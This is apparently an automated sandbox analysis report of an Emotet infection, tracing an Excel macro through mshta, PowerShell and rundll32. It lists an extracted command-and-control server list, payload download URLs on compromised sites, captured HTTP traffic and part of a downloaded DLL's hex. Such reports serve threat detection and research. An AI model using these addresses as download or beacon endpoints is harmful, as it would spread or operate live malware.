                            Source: 13.2.rundll32.exe.2fb0000.24.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                            Source: C:\ProgramData\JooSee.dllJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: >ystem.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00767E00 FindFirstFileW,

                            Software Vulnerabilities

                            barindex
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
                            Source: global trafficDNS query: name: weezual.fr
                            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

                            Networking

                            barindex
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 160.16.102.168 80
                            Source: Malware configuration extractorIPs: 160.16.102.168:80
                            Source: Malware configuration extractorIPs: 131.100.24.231:80
                            Source: Malware configuration extractorIPs: 200.17.134.35:7080
                            Source: Malware configuration extractorIPs: 207.38.84.195:8080
                            Source: Malware configuration extractorIPs: 212.237.56.116:7080
                            Source: Malware configuration extractorIPs: 58.227.42.236:80
                            Source: Malware configuration extractorIPs: 104.251.214.46:8080
                            Source: Malware configuration extractorIPs: 158.69.222.101:443
                            Source: Malware configuration extractorIPs: 192.254.71.210:443
                            Source: Malware configuration extractorIPs: 46.55.222.11:443
                            Source: Malware configuration extractorIPs: 45.118.135.203:7080
                            Source: Malware configuration extractorIPs: 107.182.225.142:8080
                            Source: Malware configuration extractorIPs: 103.75.201.2:443
                            Source: Malware configuration extractorIPs: 104.168.155.129:8080
                            Source: Malware configuration extractorIPs: 195.154.133.20:443
                            Source: Malware configuration extractorIPs: 159.8.59.82:8080
                            Source: Malware configuration extractorIPs: 110.232.117.186:8080
                            Source: Malware configuration extractorIPs: 45.142.114.231:8080
                            Source: Malware configuration extractorIPs: 41.76.108.46:8080
                            Source: Malware configuration extractorIPs: 203.114.109.124:443
                            Source: Malware configuration extractorIPs: 50.116.54.215:443
                            Source: Malware configuration extractorIPs: 209.59.138.75:7080
                            Source: Malware configuration extractorIPs: 185.157.82.211:8080
                            Source: Malware configuration extractorIPs: 164.68.99.3:8080
                            Source: Malware configuration extractorIPs: 162.214.50.39:7080
                            Source: Malware configuration extractorIPs: 138.185.72.26:8080
                            Source: Malware configuration extractorIPs: 178.63.25.185:443
                            Source: Malware configuration extractorIPs: 51.15.4.22:443
                            Source: Malware configuration extractorIPs: 81.0.236.90:443
                            Source: Malware configuration extractorIPs: 216.158.226.206:443
                            Source: Malware configuration extractorIPs: 45.176.232.124:443
                            Source: Malware configuration extractorIPs: 162.243.175.63:443
                            Source: Malware configuration extractorIPs: 212.237.17.99:8080
                            Source: Malware configuration extractorIPs: 45.118.115.99:8080
                            Source: Malware configuration extractorIPs: 129.232.188.93:443
                            Source: Malware configuration extractorIPs: 173.214.173.220:8080
                            Source: Malware configuration extractorIPs: 178.79.147.66:8080
                            Source: Malware configuration extractorIPs: 176.104.106.96:8080
                            Source: Malware configuration extractorIPs: 51.38.71.0:443
                            Source: Malware configuration extractorIPs: 173.212.193.249:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 212.24.98.99:8080
                            Source: Malware configuration extractorIPs: 159.89.230.105:443
                            Source: Malware configuration extractorIPs: 79.172.212.216:8080
                            Source: Malware configuration extractorIPs: 212.237.5.209:443
                            Source: global trafficHTTP traffic detected: GET /cc/vv/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1Host: weezual.frConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-admin/G/ HTTP/1.1Host: michaelcrompton.co.ukConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadContent-Length: 548864Connection: keep-aliveKeep-Alive: timeout=15Date: Fri, 28 Jan 2022 22:03:57 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Fri, 28 Jan 2022 22:03:57 GMTContent-Disposition: attachment; filename="aiK6pubP5D.dll"Content-Transfer-Encoding: binarySet-Cookie: 61f4684d41661=1643407437; expires=Fri, 28-Jan-2022 22:04:57 GMT; Max-Age=60; path=/Last-Modified: Fri, 28 Jan 2022 22:03:57 GMTX-Frame-Options: SAMEORIGINData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
                            Source: global trafficHTTP traffic detected: GET /cc/vv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox ViewASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox ViewIP Address: 185.157.82.211 185.157.82.211
                            Source: unknownNetwork traffic detected: IP country count 21
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172
                            Source: mshta.exe, 00000004.00000003.421270986.0000000000329000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436666911.00000000002FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.html
                            Source: opastonline.com.xls.0.drString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlB
                            Source: mshta.exe, 00000004.00000002.438112656.0000000000230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlWinSta0
                            Source: mshta.exe, 00000004.00000003.423172440.000000000263D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlfunction
                            Source: mshta.exe, 00000004.00000003.422785781.0000000002635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlhttp://91.240.118.172/cc/vv/fe.html
                            Source: mshta.exe, 00000004.00000002.438112656.0000000000230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlmshta
                            Source: mshta.exe, 00000004.00000002.438156977.000000000026E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlngs
                            Source: mshta.exe, 00000004.00000002.438930744.0000000002AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlr
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.p
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.677149502.0000000002DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.png
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.pngPE3
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ancyh.xyz
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ancyh.xyz/assets/Pcxv1k5/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ancyh.xyz/assets/Pcxv1k5/PE3
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://chupahfashion.com/eh6bwxk
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE3
                            Source: rundll32.exe, 0000000D.00000003.591845765.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                            Source: 77EC63BDA74BD0D0E0426DC8F8008506.13.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: rundll32.exe, 0000000D.00000003.591845765.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabq
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://danahousecare.com/wp-cont
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE3
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://firstfitschool.com/83wg6z
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE3
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE3
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://michaelcrompton.co.uk
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://michaelcrompton.co.uk/wp-
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://michaelcrompton.co.uk/wp-admin/G/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://michaelcrompton.co.uk/wp-admin/G/PE3
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mycloud.s
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mycloud.suplitecmo.com
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mycloud.suplitecmo.com/Fo
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE3
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sep.dfwso
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sep.dfwsolar.club/hzh3v/z
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE3
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stancewheels.com/wp-admin
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE3
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://weezual.f
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://weezual.fr
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://weezual.fr/ju9c/twEHJDCvN
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://weezual.fr/ju9c/twEHJDCvNwGimD/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://weezual.fr/ju9c/twEHJDCvNwGimD/PE3
                            Source: powershell.exe, 00000007.00000002.676501959.00000000003F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                            Source: powershell.exe, 00000007.00000002.676501959.00000000003F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                            Source: mshta.exe, 00000004.00000003.421158133.0000000002B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: mshta.exe, 00000004.00000002.438881833.00000000027CB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/
                            Source: mshta.exe, 00000004.00000002.439514279.0000000004900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/ll
                            Source: mshta.exe, 00000004.00000003.420844888.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439061631.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436135951.0000000002B46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/ode
                            Source: mshta.exe, 00000004.00000003.421270986.0000000000329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com=C:
                            Source: rundll32.exe, 0000000D.00000003.591835259.00000000003B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676575735.00000000003B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168/
                            Source: rundll32.exe, 0000000D.00000003.591835259.00000000003B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676575735.00000000003B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168/7m
                            Source: rundll32.exe, 0000000D.00000003.591845765.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/cdIXMWziBmZNcwbniRwTByQMFFhNrKiB
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hekmat20.com/wp-includes
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hekmat20.com/wp-includes/7/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hekmat20.com/wp-includes/7/PE3
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lambayeque.apiperu.net.p
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE3
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belajarngaji.shop/wp
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/
                            Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE3
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: weezual.fr
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10012C30 _memset,connect,_strcat,send,recv,
                            Source: global trafficHTTP traffic detected: GET /cc/vv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /cc/vv/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1Host: weezual.frConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-admin/G/ HTTP/1.1Host: michaelcrompton.co.ukConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 28 Jan 2022 22:03:54 GMTcontent-type: text/html; charset=iso-8859-1content-length: 261server: Apachex-iplb-request-id: 66818F3D:C00F_D5BA2104:0050_61F4684A_0BFD:14170x-iplb-instance: 31947Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p></body></html>
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
